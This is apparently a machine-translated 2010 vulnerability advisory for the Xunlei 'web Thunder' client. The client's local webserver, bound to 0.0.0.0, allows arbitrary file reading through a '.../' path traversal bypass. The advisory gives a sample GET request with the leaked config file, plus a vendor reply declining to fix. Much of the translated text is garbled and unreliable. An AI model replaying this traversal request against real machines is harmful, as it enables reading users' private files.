web Thunder remote arbitrary file reading vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201028673
Type myhack58
Reporter 佚名
Modified 2010-12-24T00:00:00


web Thunderbolt in the design and implementation problems, leading to a malicious attacker can read the install web Thunder user on the machine any files

web Thunderbolt in the present machine there is a webserver, and the binding at 0. 0. 0. 0, while for the web request processing is not appropriate, there is a safety defect leads to a malicious attacker can construct a request to read the user on the machine any files. For../Jump directory with the processing, but for.../it can be bypassed, a master of T analysis of the ideas, with the file mon Black-Box Analysis, like!)



GET /.../Profiles/UserConfig. ini HTTP/1.1 to HTTP/1.0 2 0 0 OK Server: Xunlei Http-Server/1.0 Date: Tue, 2 3 Nov 2 0 1 0 0 9:0 2:0 7 GMTContent-type: * Content-length: 407Last-Modified: Tue, 2 3 Nov 2 0 1 0 0 8:4 3:1 5 GMT[Skin] CurrSkin=default.rarSkinNames=default.rar[Monitor] ExtendNames=. asf;. avi; the. exe; the. iso;. mp3;. mpeg;. mpg;. mpga;. ra;. rar; the. rm;. rmvb;. tar;. w ma;. wmp;. wmv;. zip;. torrent;FilterSitesMax=2 0[EMuleGenericSettings] EMuleWatchLink=1[Update]RunUpdate=0[General]TaskShowPerPage=1 1[Antivirus] Protect=0FilePath=Parameter=[BHOSection]StatsDay=2[develop this program specifically]SetFolderIcon=1 Path=C:\Xunlei\send 4 3, r accepted 5 7 9: No sockC:\Documents and Settings\Administrator>


Vendor reply:

A large cow very early before you contact us about this vulnerability. But since the project is a long time there is no longer a maintenance update, so no repair. Still Thank you very much.

Considering the project has been stopped update for a long time, and people use it less and less and less, so do not intend to fix this vulnerability.